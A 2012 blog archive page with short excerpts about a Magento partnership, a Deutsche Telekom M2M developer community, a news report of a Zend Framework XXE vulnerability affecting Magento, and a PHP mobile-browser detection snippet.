PHILADELPHIA, Aug. 15, 2012 – Philadelphia e-commerce provider SUMO Heavy Industries, which handles all the heavy lifting of its customers’ online sales initiatives, has been designated by e-commerce platform Magento as a Magento Silver Solution Partner. This partnership recognizes that SUMO Heavy is an experienced leader in providing successful e-commerce […]
Daily Archives: August 15, 2012
Deutsche Telekom’s colorfully named Developer Garden platform has opened a new M2M Developer Community for machine-to-machine (M2M) communication solutions developers. The community offers developers access to APIs, discussion forums, programming guidelines, and SDKs to develop and sell applications for the M2M space, or — as it is increasingly being referred […]
A critical vulnerability in the Zend Framework can be exploited by remote attackers to access arbitrary files from online shops using the eBay-owned Magento eCommerce platform. This is because the Zend XML-RPC component used by Magento is vulnerable to XML eXternal Entity (XXE) injection attacks; successfully exploiting the hole can […]
$isMobile = false; $isBot = false; $op = strtolower($_SERVER[‘HTTP_X_OPERAMINI_PHONE’]); $ua = strtolower($_SERVER[‘HTTP_USER_AGENT’]); $ac = strtolower($_SERVER[‘HTTP_ACCEPT’]); $ip = $_SERVER[‘REMOTE_ADDR’]; $isMobile = strpos($ac, ‘application/vnd.wap.xhtml+xml’) !== false || $op != ” || strpos($ua, ‘sony’) !== false || strpos($ua, ‘symbian’) !== false || strpos($ua, ‘nokia’) !== false || strpos($ua, ‘samsung’) !== false || strpos($ua, […]